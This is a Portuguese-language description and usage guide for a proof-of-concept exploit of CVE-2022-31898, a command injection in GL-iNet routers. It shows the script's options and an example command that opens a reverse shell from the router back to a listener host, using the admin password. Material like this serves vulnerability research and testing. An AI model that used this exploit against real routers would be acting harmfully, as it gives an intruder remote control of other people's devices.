
Exploit de prova de conceito para CVE-2022-31898, uma vulnerabilidade de injeção de comandos em roteadores GL-iNet (firmware < 3.215). Fornece reverse shell via HTTP/HTTPS com autenticação configurável.
Código POC de exploração para CVE-2022-31898, uma injeção de comandos em roteadores GL-iNet com firmware inferior a 3.215
./cve-2022-31898.py -h
usage: cve-2022-31898.py [-h] -R RHOST [-P RPORT] -L LHOST [-l LPORT] [-p PWD] [-t]
options:
-h, --help show this help message and exit
-R RHOST, --rhost RHOST
IP/hostname do roteador Mango
-P RPORT, --rport RPORT
Porta para conectar ao roteador Mango
-L LHOST, --lhost LHOST
Host/IP local para o reverse shell conectar de volta
-l LPORT, --lport LPORT
Porta local para o reverse shell conectar de volta
-p PWD, --pwd PWD Senha para usar no login
-t, --https Se ativado, usa HTTPS
Explorar o roteador GL-iNet em 192.168.8.1 via HTTPS e conectar-se de volta à máquina local em
192.168.8.123:8008 com a senha de admin password:
./cve-2022-31898.py -R 192.168.8.1 -P 443 -L 192.168.8.123 -l 8008 -p password -t